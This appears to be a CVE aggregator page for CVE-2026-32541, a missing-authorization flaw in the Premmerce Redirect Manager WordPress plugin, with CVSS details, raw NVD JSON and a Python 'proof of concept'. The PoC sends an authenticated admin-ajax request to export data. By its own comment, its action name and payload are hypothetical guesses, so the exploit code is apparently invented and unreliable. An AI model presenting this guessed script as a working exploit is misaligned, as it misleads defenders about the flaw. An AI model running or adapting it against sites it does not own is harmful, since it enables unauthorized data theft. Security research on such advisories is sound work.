Security Vulnerability Report
中文
CVE-2026-32541 CVSS 6.5 MEDIUM

CVE-2026-32541

Published: 2026-03-25 17:17:08
Last Modified: 2026-04-29 10:17:22

Description

Missing Authorization vulnerability in Premmerce Premmerce Redirect Manager premmerce-redirect-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premmerce Redirect Manager: from n/a through <= 1.0.12.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Premmerce Redirect Manager <= 1.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32541 Proof of Concept # Description: Exploits missing authorization in Premmerce Redirect Manager import requests def exploit(target, cookie): # The vulnerable endpoint usually handles administrative actions url = f"{target}/wp-admin/admin-ajax.php" headers = { "User-Agent": "Mozilla/5.0", "Cookie": cookie } # Hypothetical action based on the vulnerability description payload = { "action": "premmerce_manager_action", "data": "export_all" } try: response = requests.post(url, data=payload, headers=headers, timeout=10) if response.status_code == 200 and "sensitive_data" in response.text: print("[+] Exploit successful! Data leaked.") print(response.text[:200]) else: print("[-] Target not vulnerable or patched.") except Exception as e: print(f"Error: {e}") # Usage: exploit("http://example.com", "wordpress_logged_in_...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32541", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:07.977", "lastModified": "2026-04-29T10:17:21.820", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Premmerce Premmerce Redirect Manager premmerce-redirect-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premmerce Redirect Manager: from n/a through <= 1.0.12."}, {"lang": "es", "value": "Vulnerabilidad por ausencia de autorización en Premmerce Premmerce Redirect Manager premmerce-redirect-manager permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Premmerce Redirect Manager: desde n/a hasta &lt;= 1.0.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/premmerce-redirect-manager/vulnerability/wordpress-premmerce-redirect-manager-plugin-1-0-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}